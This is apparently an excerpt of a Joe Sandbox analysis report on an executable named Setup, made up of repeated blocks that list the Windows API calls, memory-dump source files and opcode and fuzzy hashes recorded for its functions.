                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3369754026-0
                                                                                              • Opcode ID: fc6a087662c84664f9662cbf346bf3d42c49e3a13e12f8b043ece5fdc617ad00
                                                                                              • Instruction ID: 87b5018859cefa88f2c132e52a40953703b86909399cd25cf920cdc4c0dbb905
                                                                                              • Opcode Fuzzy Hash: fc6a087662c84664f9662cbf346bf3d42c49e3a13e12f8b043ece5fdc617ad00
                                                                                              • Instruction Fuzzy Hash: FD31C97190060AEBDB20CF59C9C099EF7B4FF14764B68892AF96997641C330F9A1CF91
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 63965D69
                                                                                              • SendMessageW.USER32(?,-0000190B,?,?), ref: 63965D90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3015471070-0
                                                                                              • Opcode ID: 9665a9ef357b9a0e22948b7cf1b8d789f3032b32bf6639297c4d06e6ab427a3c
                                                                                              • Instruction ID: 86d92f138ff55b8a33e5ad9e02af45e81c4aa4392c17970582924e237a670c12
                                                                                              • Opcode Fuzzy Hash: 9665a9ef357b9a0e22948b7cf1b8d789f3032b32bf6639297c4d06e6ab427a3c
                                                                                              • Instruction Fuzzy Hash: 8B110833B06A046BFB201949C9FCA5E76AED783FD0F090526F915871FBD724D4818D51
                                                                                              APIs
                                                                                                • Part of subcall function 6C91847A: RegCloseKey.ADVAPI32(?,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184BA
                                                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D468D
                                                                                              • RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C8D42F8,6C8BA794,02F92298), ref: 6C8D469E
                                                                                                • Part of subcall function 6C9183D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,6C8D4685,?,?,6C8D42F8,00000034,00000034,00000034,00000034), ref: 6C9183F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 2393043351-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch_free
                                                                                              • String ID:
                                                                                              • API String ID: 2207867443-0
                                                                                              APIs
                                                                                                • Part of subcall function 6394E2E1: GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 6394E319
                                                                                                • Part of subcall function 6394E2E1: FlushInstructionCache.KERNEL32(00000000), ref: 6394E320
                                                                                              • SetLastError.KERNEL32(0000000E,00000000,?,?,639644A7,?,?,00000000,50010000,00000000,?,?,639821D0,00000020,?,00000000), ref: 639663EF
                                                                                              • CreateWindowExW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 63966456
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheCreateCurrentErrorFlushInstructionLastProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 852167079-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F4513: __CxxThrowException@8.LIBCMT ref: 6C8F45A2
                                                                                                • Part of subcall function 6C8C8168: GetFileSize.KERNEL32(?,?,?,?,?,6C8F3B9F,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?), ref: 6C8C8178
                                                                                              • InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                                • Part of subcall function 6C8C80F7: WriteFile.KERNEL32(?,?,?,?,00000000,?,6C8F60F1), ref: 6C8C810D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3$CriticalException@8InitializeSectionSizeThrowWrite
                                                                                              • String ID:
                                                                                              • API String ID: 593797809-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90131C
                                                                                                • Part of subcall function 6C9036BA: GetUserDefaultUILanguage.KERNEL32(02F92298,?,00000000,?,?,?,?,6C901338,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498), ref: 6C9036D8
                                                                                              • _free.LIBCMT ref: 6C90137B
                                                                                                • Part of subcall function 6C90374B: __EH_prolog3.LIBCMT ref: 6C903752
                                                                                                • Part of subcall function 6C90374B: PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C8FFA6E,0000000C,6C903A05,?,6C8BA794,?), ref: 6C9037B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DefaultExistsFileLanguagePathUser_free
                                                                                              • String ID:
                                                                                              • API String ID: 2326855983-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E8CC6
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?), ref: 6C8E8D2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExistsFileH_prolog3Path
                                                                                              • String ID:
                                                                                              • API String ID: 20096932-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F906E
                                                                                              • __recalloc.LIBCMT ref: 6C8F90B0
                                                                                                • Part of subcall function 6C918E8C: __CxxThrowException@8.LIBCMT ref: 6C918EA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2968967773-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6396071E
                                                                                              • __recalloc.LIBCMT ref: 63960766
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throw__recalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2968967773-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove_s
                                                                                              • String ID:
                                                                                              • API String ID: 800865076-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                              • GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3ModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 3149745539-0
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(00000000,00000034,00000000,00000001,00000000,00000000,00000034,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184A9
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C9184BA
                                                                                                • Part of subcall function 6C918414: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,6C91849F,00000000,00000034,00000001,00000000,00000000,00000034,?,?,6C8D463B,00000034,00000034,00000000), ref: 6C918425
                                                                                                • Part of subcall function 6C918414: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C918435
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleOpenProc
                                                                                              • String ID:
                                                                                              • API String ID: 823179699-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639629F6
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D923: __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6394D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                                • Part of subcall function 6394D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                                • Part of subcall function 6394D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 63962A33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$CombineFileFreeModuleNameRelativeString
                                                                                              • String ID:
                                                                                              • API String ID: 2530041087-0
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E517C
                                                                                              • LoadLibraryW.KERNEL32(?,?,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5194
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$FreeLoad
                                                                                              • String ID:
                                                                                              • API String ID: 534179979-0
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,6C902CF3), ref: 6C8F4035
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C8F404C
                                                                                                • Part of subcall function 6C9189C8: GetLastError.KERNEL32(6C8C80E8,6C8CA9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9189C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffersCloseErrorFileFlushHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 2301079650-0
                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 6394E390
                                                                                              • PostMessageW.USER32(00000000,00000470,00000000,?), ref: 6394E3A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                               • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageParentPost
                                                                                              • String ID:
                                                                                              • API String ID: 3400216365-0
                                                                                              APIs
                                                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0029291C
                                                                                              • Run.SETUPENGINE ref: 00292922
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2623419946.0000000000291000.00000020.00000001.01000000.00000008.sdmp, Offset: 00290000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2623171849.0000000000290000.00000002.00000001.01000000.00000008.sdmp
                                                                                               • Associated: 00000004.00000002.2623684550.0000000000298000.00000004.00000001.01000000.00000008.sdmp
                                                                                               • Associated: 00000004.00000002.2623967177.000000000029A000.00000002.00000001.01000000.00000008.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_290000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapInformation
                                                                                              • String ID:
                                                                                              • API String ID: 3918721486-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794,00000000), ref: 6C8F851E
                                                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C8FFA6E,02F92298,?,?,6C8F83B3,02F92298,6C8BA794,02F92298,6C8BA794), ref: 6C8F853F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 626452242-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E8797
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8E24CD: __EH_prolog3.LIBCMT ref: 6C8E24D4
                                                                                                • Part of subcall function 6C8E24CD: __CxxThrowException@8.LIBCMT ref: 6C8E255B
                                                                                                • Part of subcall function 6C8D953C: __EH_prolog3.LIBCMT ref: 6C8D9543
                                                                                                • Part of subcall function 6C8D953C: PathFileExistsW.SHLWAPI(00000000,?,?,?), ref: 6C8D95E6
                                                                                                • Part of subcall function 6C9268B5: PMDtoOffset.LIBCMT ref: 6C926989
                                                                                                • Part of subcall function 6C9268B5: std::bad_exception::bad_exception.LIBCMT ref: 6C9269B3
                                                                                                • Part of subcall function 6C9268B5: __CxxThrowException@8.LIBCMT ref: 6C9269C1
                                                                                                • Part of subcall function 6C8E8CBF: __EH_prolog3.LIBCMT ref: 6C8E8CC6
                                                                                                • Part of subcall function 6C8F8E8B: PathCombineW.SHLWAPI(?,6C8F831D,?,76F93340,?,6C8C7971,00000000,DW\DW20.exe,?,?,6C8F831D,00000000), ref: 6C8F8EB8
                                                                                                • Part of subcall function 6C8FB369: __EH_prolog3.LIBCMT ref: 6C8FB370
                                                                                                • Part of subcall function 6C8FB369: __recalloc.LIBCMT ref: 6C8FB3BB
                                                                                                • Part of subcall function 6C8FBC6D: __recalloc.LIBCMT ref: 6C8FBCAB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                               • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                               • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FilePathThrow__recalloc$CombineExistsModuleNameOffsetstd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 1089964648-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E4205
                                                                                                • Part of subcall function 6C8D2771: __EH_prolog3.LIBCMT ref: 6C8D2778
                                                                                                • Part of subcall function 6C8E4F19: __EH_prolog3.LIBCMT ref: 6C8E4F20
                                                                                                • Part of subcall function 6C8E2081: __EH_prolog3.LIBCMT ref: 6C8E2088
                                                                                                • Part of subcall function 6C8CC17A: _calloc.LIBCMT ref: 6C8CC1A0
                                                                                                • Part of subcall function 6C9178C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C90139B,?,00000010,6C8D5A14,?,?,?,0000004C,6C90B498,?,?,?), ref: 6C9178D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ExceptionRaise_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1540488672-0
                                                                                              • Opcode ID: e6d36a7cc16b32cc1ad7dc969cc5e80cbd8389b44c9306157440a2d4fc31d905
                                                                                              • Instruction ID: b8aa4b7b7032aa7091998f82a05bbd8edad30cbcd7cdbec392ccbeb71b5cfcef
                                                                                              • Opcode Fuzzy Hash: e6d36a7cc16b32cc1ad7dc969cc5e80cbd8389b44c9306157440a2d4fc31d905
                                                                                              • Instruction Fuzzy Hash: FE513C7190124ADFCB10CFA8C680BD9BBF4BF49304F1588A9DD49AF716C770AA49CB60
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7890
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8FA226: GetTickCount.KERNEL32 ref: 6C8FA241
                                                                                                • Part of subcall function 6C8FA226: GetTickCount.KERNEL32 ref: 6C8FA27C
                                                                                                • Part of subcall function 6C8FA226: __time64.LIBCMT ref: 6C8FA282
                                                                                                • Part of subcall function 6C8FA226: InitializeCriticalSection.KERNEL32(00000040,?,6C8F7905,?), ref: 6C8FA292
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 349597444-0
                                                                                              • Opcode ID: 1269749b4e7095bca5f63ce378b283f073d6164fd1c7a1227444134520a1de8e
                                                                                              • Instruction ID: be36ce30261add375fb16e79840c6f877f71068ce441eb5578364c477c4e1eb9
                                                                                              • Opcode Fuzzy Hash: 1269749b4e7095bca5f63ce378b283f073d6164fd1c7a1227444134520a1de8e
                                                                                              • Instruction Fuzzy Hash: F6518B74610618DFDB18DF38C995AA937B1FF09324B2089A9F826DB7A1CB30E905CB50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D59BF
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D578A
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D5799
                                                                                                • Part of subcall function 6C8D56A3: SysFreeString.OLEAUT32(?), ref: 6C8D57C7
                                                                                                • Part of subcall function 6C901315: __EH_prolog3.LIBCMT ref: 6C90131C
                                                                                                • Part of subcall function 6C901315: _free.LIBCMT ref: 6C90137B
                                                                                                • Part of subcall function 6C8FB17C: __recalloc.LIBCMT ref: 6C8FB18D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$H_prolog3$__recalloc_free
                                                                                              • String ID:
                                                                                              • API String ID: 2446356840-0
                                                                                              • Opcode ID: 81dc078742b44b860cbb99ac1aef243bad407f41d66ec717e600415fa79926fa
                                                                                              • Instruction ID: ec11db43b7fceaf6423cc871629b70b1d9866b63d8390d84ec42ed6bd5b3d540
                                                                                              • Opcode Fuzzy Hash: 81dc078742b44b860cbb99ac1aef243bad407f41d66ec717e600415fa79926fa
                                                                                              • Instruction Fuzzy Hash: 385128B190131A9FCB50CFA8C68169EBBF0FF18304F55896ED459ABB00D730AA49CF91
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 63965E81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: 768dd9c18f098967cd32ae7b50fa61dbe693b9b78e99788e7a0b22cf571e5b1a
